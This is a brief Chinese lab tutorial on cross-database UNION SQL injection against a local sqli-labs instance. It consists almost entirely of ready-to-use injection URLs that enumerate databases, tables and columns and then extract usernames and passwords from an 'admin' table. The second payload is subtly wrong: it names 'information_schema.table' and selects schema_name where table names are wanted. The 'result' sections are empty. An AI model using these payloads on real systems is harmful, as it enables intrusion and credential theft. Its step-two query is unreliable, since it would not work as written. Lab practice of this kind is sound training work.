Root用户注入攻击,必须是root,必须是mysql,必须两个数据库都在mysql里面
①获取所有数据库名
②获取指定数据库名injection的表名信息
③获取指定表名admin的列名信息
跨库操作:
①获取所有数据库名
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata–+
效果:
②获取指定数据库名injection的表名信息
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.table where table_schema=’injection’–+
效果:
③获取指定表名admin的列名信息
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’admin’ and table_schema=’injection’–+
效果:
④获取其他数据库的数据:
Url:http://127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user,pass from injection(injection这里不写的话会默认本数据库).admin